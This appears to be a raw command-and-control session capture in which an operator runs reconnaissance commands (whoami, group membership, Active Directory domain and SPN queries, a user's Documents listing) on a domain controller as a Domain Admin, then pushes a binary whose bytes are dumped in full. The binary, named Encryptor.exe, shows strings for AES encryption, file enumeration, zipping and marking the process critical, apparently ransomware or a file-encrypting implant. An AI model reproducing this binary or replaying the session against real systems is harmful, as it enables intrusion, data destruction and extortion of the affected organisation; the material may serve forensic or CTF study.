yOaw1fs6
rc
whoami
megacorp\rashley

rc
whoami /groups

GROUP INFORMATION
-----------------

Group Name                                      Type             SID                                           Attributes                                                     
=============================================== ================ ============================================= ===============================================================
Everyone                                        Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group             
BUILTIN\Users                                   Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group             
BUILTIN\Pre-Windows 2000 Compatible Access      Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group             
BUILTIN\Administrators                          Alias            S-1-5-32-544                                  Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\INTERACTIVE                        Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group             
CONSOLE LOGON                                   Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Authenticated Users                Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\This Organization                  Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group             
LOCAL                                           Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group             
MEGACORP\Domain Admins                          Group            S-1-5-21-2568767272-3650002656-3939649453-512 Mandatory group, Enabled by default, Enabled group             
Authentication authority asserted identity      Well-known group S-1-18-1                                      Mandatory group, Enabled by default, Enabled group             
MEGACORP\Denied RODC Password Replication Group Alias            S-1-5-21-2568767272-3650002656-3939649453-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level            Label            S-1-16-12288                                                                                                 

rc
hostname
WS02

rc
powershell Get-ADDomain


AllowedDNSSuffixes                 : {}
ChildDomains                       : {}
ComputersContainer                 : CN=Computers,DC=MEGACORP,DC=LOCAL
DeletedObjectsContainer            : CN=Deleted Objects,DC=MEGACORP,DC=LOCAL
DistinguishedName                  : DC=MEGACORP,DC=LOCAL
DNSRoot                            : MEGACORP.LOCAL
DomainControllersContainer         : OU=Domain Controllers,DC=MEGACORP,DC=LOCAL
DomainMode                         : Windows2016Domain
DomainSID                          : S-1-5-21-2568767272-3650002656-3939649453
ForeignSecurityPrincipalsContainer : CN=ForeignSecurityPrincipals,DC=MEGACORP,DC=LOCAL
Forest                             : MEGACORP.LOCAL
InfrastructureMaster               : WS02.MEGACORP.LOCAL
LastLogonReplicationInterval       : 
LinkedGroupPolicyObjects           : {CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=MEGACORP,DC=LO
                                     CAL}
LostAndFoundContainer              : CN=LostAndFound,DC=MEGACORP,DC=LOCAL
ManagedBy                          : 
Name                               : MEGACORP
NetBIOSName                        : MEGACORP
ObjectClass                        : domainDNS
ObjectGUID                         : b1adbda3-eb9a-4be3-8627-819232d17938
ParentDomain                       : 
PDCEmulator                        : WS02.MEGACORP.LOCAL
PublicKeyRequiredPasswordRolling   : True
QuotasContainer                    : CN=NTDS Quotas,DC=MEGACORP,DC=LOCAL
ReadOnlyReplicaDirectoryServers    : {}
ReplicaDirectoryServers            : {WS02.MEGACORP.LOCAL}
RIDMaster                          : WS02.MEGACORP.LOCAL
SubordinateReferences              : {DC=ForestDnsZones,DC=MEGACORP,DC=LOCAL, DC=DomainDnsZones,DC=MEGACORP,DC=LOCAL, 
                                     CN=Configuration,DC=MEGACORP,DC=LOCAL}
SystemsContainer                   : CN=System,DC=MEGACORP,DC=LOCAL
UsersContainer                     : CN=Users,DC=MEGACORP,DC=LOCAL




rc
setspn -L WS02
Registered ServicePrincipalNames for CN=WS02,OU=Domain Controllers,DC=MEGACORP,DC=LOCAL:
	Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/WS02.MEGACORP.LOCAL
	ldap/WS02.MEGACORP.LOCAL/ForestDnsZones.MEGACORP.LOCAL
	ldap/WS02.MEGACORP.LOCAL/DomainDnsZones.MEGACORP.LOCAL
	DNS/WS02.MEGACORP.LOCAL
	GC/WS02.MEGACORP.LOCAL/MEGACORP.LOCAL
	RestrictedKrbHost/WS02.MEGACORP.LOCAL
	RestrictedKrbHost/WS02
	RPC/227edde9-d608-4432-b00a-a5d25595d1ac._msdcs.MEGACORP.LOCAL
	HOST/WS02/MEGACORP
	HOST/WS02.MEGACORP.LOCAL/MEGACORP
	HOST/WS02
	HOST/WS02.MEGACORP.LOCAL
	HOST/WS02.MEGACORP.LOCAL/MEGACORP.LOCAL
	E3514235-4B06-11D1-AB04-00C04FC2DCD2/227edde9-d608-4432-b00a-a5d25595d1ac/MEGACORP.LOCAL
	ldap/WS02/MEGACORP
	ldap/227edde9-d608-4432-b00a-a5d25595d1ac._msdcs.MEGACORP.LOCAL
	ldap/WS02.MEGACORP.LOCAL/MEGACORP
	ldap/WS02
	ldap/WS02.MEGACORP.LOCAL
	ldap/WS02.MEGACORP.LOCAL/MEGACORP.LOCAL

rc
dir C:\Users\RAshley\Documents
 Volume in drive C has no label.
 Volume Serial Number is 363A-11A5

 Directory of C:\Users\RAshley\Documents

07/06/2021  04:33 PM    <DIR>          .
07/06/2021  04:33 PM    <DIR>          ..
07/06/2021  01:24 PM            33,364 Confidential.pdf
07/06/2021  04:26 PM    <DIR>          Invoice
07/06/2021  04:26 PM    <DIR>          Receipt
               1 File(s)         33,364 bytes
               4 Dir(s)  45,392,068,608 bytes free

wr
Service
mmgb4UNqb3JWGZm7n7Gt9kTtBm6w9pbVWuah
ok
la
b'MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4\t\xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode.\r\r\n$\x00\x00\x00\x00\x00\x00\x00PE\x00\x00L\x01\x03\x00Fw\xe8\xf8\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00"\x00\x0b\x010\x00\x00\x16\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x865\x00\x00\x00 \x00\x00\x00@\x00\x00\x00\x00@\x00\x00 \x00\x00\x00\x02\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x03\x00`\x85\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0035\x00\x00O\x00\x00\x00\x00@\x00\x00\xac\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x0c\x00\x00\x00\xac4\x00\x008\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08 \x00\x00H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.text\x00\x00\x00\x8c\x15\x00\x00\x00 \x00\x00\x00\x16\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00`.rsrc\x00\x00\x00\xac\x05\x00\x00\x00@\x00\x00\x00\x06\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00@.reloc\x00\x00\x0c\x00\x00\x00\x00`\x00\x00\x00\x02\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00g5\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x02\x00\x05\x00\xe4#\x00\x00\xc8\x10\x00\x00\x03\x00\x02\x00\x02\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x130\x03\x00Z\x00\x00\x00\x01\x00\x00\x11(\x0f\x00\x00\n\x02\x16\x9ao\x10\x00\x00\n\x80\x01\x00\x00\x04(\x11\x00\x00\n(\x07\x00\x00\x06(\t\x00\x00\x06(\x12\x00\x00\n\n\x12\x00\xfe\x16\x11\x00\x00\x01o\x13\x00\x00\n\x80\x02\x00\x00\x04~\x02\x00\x00\x04(\x04\x00\x00\x06\x1b(\x14\x00\x00\n(\x06\x00\x00\x06&(\x03\x00\x00\x06(\x08\x00\x00\x06*\x8a\x1b(\x14\x00\x00\n\x16(\x14\x00\x00\nr\x01\x00\x00p\x17(\x05\x00\x00\x06(\x15\x00\x00\n(\x16\x00\x00\n*\x00\x00\x00\x130\x03\x00/\x00\x00\x00\x02\x00\x00\x11r+\x00\x00p\x17(\x05\x00\x00\x06r]\x00\x00p\x17(\x05\x00\x00\x06\n\x06(\x15\x00\x00\nr\xf8\x00\x00p\x17(\x05\x00\x00\x06\x02(\x17\x00\x00\n*\x00\x130\x05\x00N\x00\x00\x00\x03\x00\x00\x11\x03,\t\x02(\x18\x00\x00\n\n+\x0c(\x0f\x00\x00\n\x02o\x10\x00\x00\n\ns\x19\x00\x00\n\x0b\x16\x0c+\x1f\x07\x06\x08\x91~\x01\x00\x00\x04\x08~\x01\x00\x00\x04\x8ei]\x91a\xd1o\x1a\x00\x00\n&\x08\x17X\x0c\x08\x06\x8ei2\xdb\x07o\x13\x00\x00\n*\x00\x00\x1b0\x03\x00@\x00\x00\x00\x04\x00\x00\x11\x02r\x12\x01\x00p\x17(\x1b\x00\x00\no\x1c\x00\x00\n\n+\x16\x06o\x1d\x00\x00\n~\x02\x00\x00\x04\x16(\x05\x00\x00\x06(\x0b\x00\x00\x06\x06o\x1e\x00\x00\n-\xe2\xde\n\x06,\x06\x06o\x1f\x00\x00\n\xdc\x17*\x01\x10\x00\x00\x02\x00\x12\x00"4\x00\n\x00\x00\x00\x00\x130\x04\x00\x18\x00\x00\x00\x05\x00\x00\x11\x17\n( \x00\x00\no!\x00\x00\n\x1f\x1d\x12\x00\x1a(\x01\x00\x00\x06&*\x130\x04\x00\x18\x00\x00\x00\x05\x00\x00\x11\x16\n( \x00\x00\no!\x00\x00\n\x1f\x1d\x12\x00\x1a(\x01\x00\x00\x06&*\x130\x04\x00H\x00\x00\x00\x06\x00\x00\x11s"\x00\x00\ns#\x00\x00\n\n\x06\x17o$\x00\x00\n\x06r\x16\x01\x00p\x17(\x05\x00\x00\x06o%\x00\x00\n\x06r0\x01\x00p\x17(\x05\x00\x00\x06o&\x00\x00\n%\x06o\'\x00\x00\n%o(\x00\x00\n&o)\x00\x00\n*\x1b0\x02\x000\x00\x00\x00\x07\x00\x00\x11\x1f \x8d)\x00\x00\x01\ns*\x00\x00\n\x0b\x16\x0c+\x0b\x07\x06o+\x00\x00\n\x08\x17X\x0c\x08\x1f\n2\xf0\xde\n\x07,\x06\x07o\x1f\x00\x00\n\xdc\x06*\x01\x10\x00\x00\x02\x00\x0e\x00\x16$\x00\n\x00\x00\x00\x00\x1b0\x04\x00\xf9\x00\x00\x00\x08\x00\x00\x11(\n\x00\x00\x06\n\x02r\xa2\x01\x00p\x17(\x05\x00\x00\x06(\x15\x00\x00\n\x18s,\x00\x00\n\x0b(\x0f\x00\x00\n\x03o\x10\x00\x00\ns-\x00\x00\n\x0c\x08 \x00\x01\x00\x00o.\x00\x00\n\x08 \x80\x00\x00\x00o/\x00\x00\n\x08\x18o0\x00\x00\n\x06 P\xc3\x00\x00s1\x00\x00\n\r\x08\t\x08o2\x00\x00\n\x1e[o3\x00\x00\no4\x00\x00\n\x08\t\x08o5\x00\x00\n\x1e[o3\x00\x00\no6\x00\x00\n\x08\x1ao7\x00\x00\n\x07\x06\x16\x06\x8eio8\x00\x00\n\x07\x08o9\x00\x00\n\x17s:\x00\x00\n\x13\x04\x02\x19s,\x00\x00\n\x13\x05 \x00\x04\x00\x00\x8d)\x00\x00\x01\x13\x06+\x0c\x11\x04\x11\x06\x16\x11\x07o8\x00\x00\n\x11\x05\x11\x06\x16\x11\x06\x8eio;\x00\x00\n%\x13\x07\x160\xe0\x11\x05o<\x00\x00\n\xde\x11&\xde\x14\x11\x04o<\x00\x00\n\x07o<\x00\x00\n\xdc\x02(=\x00\x00\n*\x00\x00\x00\x01\x1c\x00\x00\x00\x00\xb6\x00+\xe1\x00\x03\x1a\x00\x00\x01\x02\x00\xb6\x00.\xe4\x00\x0e\x00\x00\x00\x00\x1e\x02(>\x00\x00\n*BSJB\x01\x00\x01\x00\x00\x00\x00\x00\x0c\x00\x00\x00v4.0.30319\x00\x00\x00\x00\x05\x00l\x00\x00\x00\xe4\x04\x00\x00#~\x00\x00P\x05\x00\x00t\x07\x00\x00#Strings\x00\x00\x00\x00\xc4\x0c\x00\x00\xb4\x01\x00\x00#US\x00x\x0e\x00\x00\x10\x00\x00\x00#GUID\x00\x00\x00\x88\x0e\x00\x00@\x02\x00\x00#Blob\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x01W\x1d\x02\x1c\t\x00\x00\x00\x00\xfa\x013\x00\x16\x00\x00\x01\x00\x00\x003\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x0c\x00\x00\x00\x0b\x00\x00\x00>\x00\x00\x00\x01\x00\x00\x00\x0e\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00I\x03\x01\x00\x00\x00\x00\x00\x06\x00\xaa\x02\xcc\x05\x06\x00\x17\x03\xcc\x05\x06\x00\xde\x01\x95\x05\x0f\x00\xec\x05\x00\x00\x06\x00\x06\x02\xb2\x04\x06\x00\x8d\x02\xb2\x04\x06\x00n\x02\xb2\x04\x06\x00\xfe\x02\xb2\x04\x06\x00\xca\x02\xb2\x04\x06\x00\xe3\x02\xb2\x04\x06\x00\x1d\x02\xb2\x04\x06\x00\xf2\x01\xad\x05\x06\x00\xd0\x01\xad\x05\x06\x00Q\x02\xb2\x04\x06\x008\x02\xa0\x03\x06\x00\xaf\x06H\x04\x06\x00\x11\x01H\x04\x06\x003\x05\xf1\x06\x06\x00\x0f\x00\xde\x00\n\x00\xe9\x04\x95\x05\x06\x00\x1a\x058\x07\x06\x00\x16\x04\x80\x00\x06\x00\xfe\x008\x07\x06\x00\n\x068\x07\x06\x00!\x048\x07\x06\x00\xd1\x04H\x04\x06\x00\x97\x03\xf1\x06\n\x00\x81\x06\x95\x05\x06\x00\xc2\x06H\x04w\x00A\x05\x00\x00\x06\x00\xcd\x03H\x04\x0e\x00}\x01\x89\x04\x06\x00i\x07\x1d\x00\x06\x00\xe0\x06H\x04\x06\x00_\x07\x80\x00\x06\x00\x01\x00\xde\x00\x06\x00\xc4\x04\x80\x00\x06\x00O\x05+\x06\x06\x00f\x01H\x04\n\x00\x95\x01\x95\x05\x06\x005\x03H\x04\x06\x00i\x058\x07\x06\x00&\x01\x80\x00\x06\x00O\x048\x07\x06\x00/\x018\x07\x06\x00\x11\x068\x07\x06\x00[\x018\x07\x06\x00\'\x04\x80\x00\x06\x00b\x048\x07\x06\x00J\x018\x07\x06\x00\x80\x01\x80\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x01\x00\x01\x00\x00\x00\x10\x00\x1f\x07\x91\x00A\x00\x01\x00\x01\x00\x11\x00\t\x058\x01\x11\x00\xfa\x04<\x01\x00\x00\x00\x00\x80\x00\x91 _\x06?\x01\x01\x00P \x00\x00\x00\x00\x91\x00\x84\x04H\x01\x05\x00\xb6 \x00\x00\x00\x00\x91\x00\x97\x06*\x00\x06\x00\xdc \x00\x00\x00\x00\x91\x00\xfb\x03(\x01\x06\x00\x18!\x00\x00\x00\x00\x91\x00\xa2\x00N\x01\x07\x00t!\x00\x00\x00\x00\x91\x006\x00T\x01\t\x00\xd0!\x00\x00\x00\x00\x91\x00\x0e\x07*\x00\n\x00\xf4!\x00\x00\x00\x00\x91\x00\xfd\x06*\x00\n\x00\x18"\x00\x00\x00\x00\x91\x00s\x04*\x00\n\x00l"\x00\x00\x00\x00\x91\x00\xcd\x00Y\x01\n\x00\xb8"\x00\x00\x00\x00\x91\x00o\x00C\x00\n\x00\xdc#\x00\x00\x00\x00\x86\x18\x7f\x05\x06\x00\x0c\x00\x00\x00\x01\x00V\x06\x00\x00\x02\x00>\x06\x00\x00\x03\x00\x9f\x04\x00\x00\x04\x00\xe2\x03\x00\x00\x01\x00&\x06\x00\x00\x01\x00C\x03\x00\x00\x01\x00P\x00\x10\x10\x02\x00a\x00\x00\x00\x01\x00\xa8\x05\x00\x00\x01\x00\xb3\x00\x00\x00\x02\x00\t\x05\t\x00\x7f\x05\x01\x00\x11\x00\x7f\x05\x06\x00\x19\x00\x7f\x05\n\x00)\x00\x7f\x05\x10\x001\x00\x7f\x05\x10\x009\x00\x7f\x05\x10\x00A\x00\x7f\x05\x10\x00I\x00\x7f\x05\x10\x00Q\x00\x7f\x05\x10\x00Y\x00\x7f\x05\x10\x00a\x00\x7f\x05\x15\x00i\x00\x7f\x05\x10\x00q\x00\x7f\x05\x10\x00y\x00\x7f\x05\x10\x00\xd9\x00-\x00\x1f\x00\xd9\x00\x1d\x06$\x00\xe1\x00;\x01*\x00\x89\x00\x0e\x01.\x00\x81\x00\xcb\x033\x00\xe9\x00\xd4\x037\x00\xf9\x00\xa8\x06=\x00\x01\x01U\x07C\x00\t\x01:\x03M\x00\x11\x01\xba\x03\\\x00\x91\x00\x7f\x05\x06\x00\x91\x00\x16\x01b\x00\x19\x01\xfb\x05p\x00\x0c\x00[\x05\x85\x00\x14\x00\xce\x06\x94\x001\x01\xe8\x06\x99\x009\x01\xbb\x01\x06\x00\xe1\x00w\x06\xa1\x00\xe1\x00r\x01\xa6\x00\xe1\x00\x7f\x05\x06\x00\xa1\x00\x7f\x05\x06\x00\xa1\x00\x85\x01\xaf\x00\xa1\x00\xa8\x01\x10\x00\xa1\x00\x89\x06\x10\x00\xe1\x00\xdb\x04\xb6\x00\xe1\x00\xda\x06\x99\x00\xe1\x00\xb6\x06\x06\x00\xa9\x00\x7f\x05\x06\x00Q\x01\x1d\x06\xc4\x00\xb1\x00\x7f\x05\xdc\x00\xb9\x00\x7f\x05\x06\x00a\x01\x7f\x03\x01\x00a\x01e\x03\x01\x00a\x01\x8b\x03\xe4\x00\xc1\x00\x7f\x05\xeb\x00a\x01s\x03\xf4\x00q\x01\x1d\x06\xf8\x00a\x010\x07\xc4\x00a\x01W\x03\xf4\x00a\x01\x8a\x00\xc4\x00a\x01\x1d\x01\xfe\x00\x81\x01\xca\x01\x05\x01a\x01\x85\x05\r\x01\xc9\x00\x7f\x05\x13\x01\x81\x01\xf9\x00 \x01\x81\x01\xb5\x01\x06\x00\x99\x01\xc3\x01(\x01\x81\x00\x7f\x05\x06\x00\x02\x00!\x006\x01.\x00\x0b\x00^\x01.\x00\x13\x00g\x01.\x00\x1b\x00\x86\x01.\x00#\x00\x8f\x01.\x00+\x00\x9e\x01.\x003\x00\x9e\x01.\x00;\x00\x9e\x01.\x00C\x00\x8f\x01.\x00K\x00\xa4\x01.\x00S\x00\x9e\x01.\x00[\x00\x9e\x01.\x00c\x00\xbc\x01.\x00k\x00\xe6\x01.\x00s\x00\xf3\x01\x1a\x00I\x00T\x00h\x00\x9d\x00\xaa\x00\xbc\x00\xca\x00\x0c\x04~\x00\x8e\x00@\x01\x03\x00_\x06\x01\x00\x04\x80\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8b\x05\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-\x01\xc4\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-\x01H\x04\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-\x01.\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00IEnumerable`1\x00IEnumerator`1\x00Microsoft.Win32\x00get_UTF8\x00x3bMQH27hJEt2sz8\x00<Module>\x00FjzAXMdCE8cSHttD\x00cSHsdasdqwttD\x00s2T4rbNt4JPA6DeM\x00System.IO\x00set_IV\x00P82CEMnv2rbWVh6Z\x00nVw6FkXDzmwHwVWZ\x00yr9Zavw65pKUDrxZ\x00mscorlib\x00GWW79N5ekj2aMunb\x00System.Collections.Generic\x00Read\x00RijndaelManaged\x00NewGuid\x00Append\x00set_Mode\x00FileMode\x00PaddingMode\x00EnterDebugMode\x00CryptoStreamMode\x00CipherMode\x00IDisposable\x00get_Handle\x00ZipFile\x00set_WindowStyle\x00ProcessWindowStyle\x00set_FileName\x00Close\x00Dispose\x00Delete\x00Write\x00GuidAttribute\x00DebuggableAttribute\x00ComVisibleAttribute\x00AssemblyTitleAttribute\x00AssemblyTrademarkAttribute\x00TargetFrameworkAttribute\x00AssemblyFileVersionAttribute\x00AssemblyConfigurationAttribute\x00AssemblyDescriptionAttribute\x00CompilationRelaxationsAttribute\x00AssemblyProductAttribute\x00AssemblyCopyrightAttribute\x00AssemblyCompanyAttribute\x00RuntimeCompatibilityAttribute\x00Byte\x00SetValue\x00value\x00Encryptor.exe\x00get_BlockSize\x00set_BlockSize\x00get_KeySize\x00set_KeySize\x00set_Padding\x00Encoding\x00System.Runtime.Versioning\x00FromBase64String\x00ToString\x00GetFolderPath\x00processInformationLength\x00whJa4rDSBHveMmfj\x00ntdll.dll\x00FileStream\x00CryptoStream\x00System.IO.Compression.FileSystem\x00SymmetricAlgorithm\x00ICryptoTransform\x00AyXrBuuet7ws6wwm\x00Main\x00System.IO.Compression\x00processInformation\x00System.Reflection\x00SearchOption\x00Exception\x00set_StartInfo\x00ProcessStartInfo\x00xAPhk2qx93MCMp\x00PFEFqXuurH3zqxNp\x00RNGCryptoServiceProvider\x00StringBuilder\x00SpecialFolder\x00IEnumerator\x00GetEnumerator\x00RandomNumberGenerator\x00.ctor\x00CreateEncryptor\x00System.Diagnostics\x00docs\x00System.Runtime.InteropServices\x00System.Runtime.CompilerServices\x00DebuggingModes\x00EnumerateFiles\x00Rfc2898DeriveBytes\x00GetBytes\x00args\x00System.Collections\x00processInformationClass\x00hProcess\x00NtSetInformationProcess\x00GetCurrentProcess\x00set_Arguments\x00sr3CHyHkkqFMq39t\x00Concat\x00Object\x00WaitForExit\x00Environment\x00get_Current\x00Start\x00Convert\x00MoveNext\x00System.Text\x00EhRZme1b7R2xGexu\x00EhRZme2b7R2xGexu\x00umj3VnYEF8fY3bkw\x00set_Key\x00System.Security.Cryptography\x00CreateFromDirectory\x00Registry\x00\x00\x00\x00)H\x00S\x00o\x00R\x00A\x00h\x00h\x004\x00F\x00z\x000\x00S\x00R\x00g\x005\x00a\x00N\x00z\x00k\x00Z\x00\x001C\x00R\x00g\x007\x00L\x00j\x00V\x00k\x00J\x00g\x00A\x00j\x00d\x00i\x001\x00r\x00B\x00h\x00g\x005\x00P\x00B\x00w\x00=\x00\x00\x80\x99H\x00Q\x00A\x00R\x00E\x00R\x005\x00Q\x00E\x00i\x00A\x00U\x00b\x00y\x005\x00W\x00O\x00j\x008\x00F\x00C\x00i\x00F\x00V\x00B\x00m\x00A\x00h\x00X\x00U\x00Y\x000\x00D\x00y\x008\x00T\x00P\x00R\x00U\x00d\x00J\x00A\x00w\x00l\x00A\x000\x00p\x00y\x00J\x00C\x00E\x00N\x00H\x00g\x00V\x00J\x00L\x00w\x00U\x00Y\x00X\x00Q\x00d\x00Q\x00L\x00j\x004\x00/\x00C\x00S\x00p\x00S\x00B\x00l\x00k\x00=\x00\x00\x19F\x00C\x00M\x00a\x00F\x00h\x005\x00C\x00O\x00D\x00c\x00I\x00\x00\x03*\x00\x00\x19I\x00j\x004\x00a\x00W\x00Q\x009\x00f\x00F\x00g\x00=\x00=\x00\x00qb\x00j\x00B\x00e\x00A\x00R\x00l\x00U\x00E\x00j\x00Y\x00c\x00W\x00g\x000\x00R\x00P\x00D\x00U\x00P\x00W\x00Q\x00p\x00W\x00H\x00l\x00k\x00C\x00U\x00Q\x00g\x00D\x00C\x00D\x00k\x00E\x00D\x00i\x00E\x00b\x00d\x00l\x00E\x00h\x00A\x00V\x00I\x00E\x00b\x00i\x00I\x00L\x00H\x00g\x009\x00T\x00\x00\x11b\x00z\x00Q\x00W\x00G\x00B\x00l\x00T\x00\x00vA\xd8c+2\x05O\xa9E\xc5G\xd9F\xfa|\x00\x04 \x01\x01\x08\x03 \x00\x01\x05 \x01\x01\x11\x11\x04 \x01\x01\x0e\x04 \x01\x01\x02\x04\x07\x01\x11E\x04\x00\x00\x12m\x05 \x01\x1d\x05\x0e\x03\x00\x00\x01\x04\x00\x00\x11E\x03 \x00\x0e\x05\x00\x01\x0e\x11y\x05\x00\x02\x0e\x0e\x0e\x05\x00\x02\x01\x0e\x0e\x03\x07\x01\x0e\x06\x00\x03\x01\x0e\x0e\x1c\x07\x07\x03\x1d\x05\x12I\x08\x05\x00\x01\x1d\x05\x0e\x05 \x01\x12I\x03\x07\x07\x01\x15\x12M\x01\x0e\r\x00\x03\x15\x12\x80\x91\x01\x0e\x0e\x0e\x11\x80\x95\x06\x15\x12\x80\x91\x01\x0e\x08 \x00\x15\x12M\x01\x13\x00\x05\x15\x12M\x01\x0e\x04 \x00\x13\x00\x03 \x00\x02\x03\x07\x01\x08\x04\x00\x00\x12q\x03 \x00\x18\x04\x07\x01\x12Q\x06 \x01\x01\x11\x80\xa1\x05 \x01\x01\x12Q\x07\x07\x03\x1d\x05\x12U\x08\x05 \x01\x01\x1d\x05\x11\x07\x08\x1d\x05\x12Y\x12]\x12a\x12e\x12Y\x1d\x05\x08\x07 \x02\x01\x0e\x11\x80\xad\x06 \x01\x01\x11\x80\xb5\x08 \x03\x01\x1d\x05\x1d\x05\x08\x03 \x00\x08\x05 \x01\x1d\x05\x08\x06 \x01\x01\x11\x80\xbd\x07 \x03\x01\x1d\x05\x08\x08\x05 \x00\x12\x80\xc5\x0c \x03\x01\x12\x80\xc1\x12\x80\xc5\x11\x80\xc9\x07 \x03\x08\x1d\x05\x08\x08\x04\x00\x01\x01\x0e\x08\xb7z\\V\x194\xe0\x89\x01\x01\x03\x06\x1d\x05\x02\x06\x0e\x08\x00\x04\x08\x18\x08\x10\x08\x08\x05\x00\x01\x01\x1d\x0e\x05\x00\x02\x0e\x0e\x02\x04\x00\x01\x02\x0e\x04\x00\x00\x1d\x05\x08\x01\x00\x08\x00\x00\x00\x00\x00\x1e\x01\x00\x01\x00T\x02\x16WrapNonExceptionThrows\x01\x08\x01\x00\x02\x00\x00\x00\x00\x00\x0e\x01\x00\tEncryptor\x00\x00\x05\x01\x00\x00\x00\x00\x17\x01\x00\x12Copyright \xc2\xa9  2021\x00\x00)\x01\x00$75023897-8134-4def-8dbf-a1d9b74ebe8f\x00\x00\x0c\x01\x00\x071.0.0.0\x00\x00I\x01\x00\x1a.NETFramework,Version=v4.8\x01\x00T\x0e\x14FrameworkDisplayName\x12.NET Framework 4.8\x00\x00\x00\x00\x00\x00\x00t\x9c\x1e\x81\x00\x00\x00\x00\x02\x00\x00\x00O\x00\x00\x00\xe44\x00\x00\xe4\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00RSDS\xd7\x8e\xc3\n\xb0\xc6AN\x96\x08B\xcd8\x0b\x9d\r\x01\x00\x00\x00C:\\Repos\\Encryptor\\Encryptor\\obj\\Release\\Encryptor.pdb\x00[5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u5\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00g5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00_CorExeMain\x00mscoree.dll\x00\x00\x00\x00\x00\x00\xff%\x00 @\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x10\x00\x00\x00 